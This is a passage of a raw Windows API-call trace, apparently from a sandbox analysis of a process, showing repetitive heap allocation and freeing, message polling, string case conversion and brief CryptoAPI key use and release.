lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.563] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0268.563] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.563] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.563] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.563] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.563] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0268.563] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.563] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.563] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.563] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.563] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.564] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.564] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.564] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.564] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b2bb8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b2bb8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0268.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.564] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.564] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0268.564] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.564] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0268.565] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.565] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.565] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0268.565] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.565] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0268.565] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.565] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.565] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.565] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.565] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.565] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.565] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.565] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.565] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.565] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.566] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.566] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.566] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.566] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.566] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.566] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.566] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.566] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0268.566] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.566] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0268.566] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.566] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.567] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.567] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0268.567] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.567] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0268.567] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0268.567] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.567] CryptDestroyKey (hKey=0xaa5860) returned 1 [0268.567] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.567] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.567] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0268.567] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.567] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0268.567] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.567] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.568] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0268.568] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.568] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0268.568] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.568] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.568] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.568] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.568] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.568] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0268.568] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.568] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0268.568] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0268.568] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.568] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.568] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.569] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.569] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.569] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0268.569] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.569] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0268.569] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.569] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.569] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0268.569] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.569] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0268.569] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.569] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.569] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.569] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.570] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.570] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.570] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.570] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.570] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.570] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.570] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.570] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.570] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.570] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.570] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.570] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0268.570] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.570] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0268.571] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.571] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.571] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.571] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0268.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0268.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0268.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0268.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0268.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0268.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0268.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0268.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0268.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0268.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0268.573] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0268.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0268.573] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0268.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0268.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0268.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.574] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0268.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0268.574] 